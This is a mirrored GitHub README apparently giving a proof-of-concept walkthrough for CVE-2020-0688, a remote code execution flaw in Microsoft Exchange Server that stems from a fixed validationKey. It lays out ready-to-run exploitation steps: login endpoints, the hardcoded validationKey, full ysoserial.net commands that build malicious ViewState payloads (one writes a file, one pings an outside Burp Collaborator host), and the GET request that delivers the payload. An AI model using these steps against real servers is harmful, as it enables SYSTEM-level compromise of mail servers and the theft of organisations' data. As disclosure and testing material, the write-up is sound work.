Giters

murataydemir / CVE-2020-0688

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)

Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same validationKey and decryptionKey values in web.config. Thus, an authenticated attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of YSoSerial.net, an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel (ECP) web application, which runs as SYSTEM privileges.

Step 1: Visit one of the following endpoints and access to authentication page

  • http(s)://exchangeserver/owa
  • http(s)://exchangeserver/owa/auth.owa
  • http(s)://exchangeserver/owa/auth/logon.aspx
  • http(s)://exchangeserver/ecp
  • http(s)://exchangeserver/ecp/default.aspx

Step 2: Login with credential (no matter user account privileges), and get valid ASP_NET_SessionId and __VIEWSTATEGENERATOR values from HTTP response Cookie and HTTP response body respectively. For example

  • ASP_NET_SessionId: 05ae4b41-51e1-4c3a-9241-6b87b169d663
  • __VIEWSTATEGENERATOR: B97B4E27
  • validationKey (Fixed): CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
  • validationalg (Fixed): SHA1

Step 3: In order to generate payload (to check vuln.), use YSoSerial.net

Note that if you have access to victim exchange server, you can use the following payload which create text file in C:\ directory as PoC.txt name

PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/PoC.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

However, you can't access to server, may following would be better.

PS C:\>ysoserial.net\ysoserial\bin\Release\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping xxxxxxxx..burpcollaborator.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy

Step 4: After step 4, we'll have had url-encoded ViewState payload. Do GET request at below endpoint as following format

http(s)://exchangeserver/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState_Payload>

Original blogpost available is here

About

[CVE-2020-0688] Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution (RCE)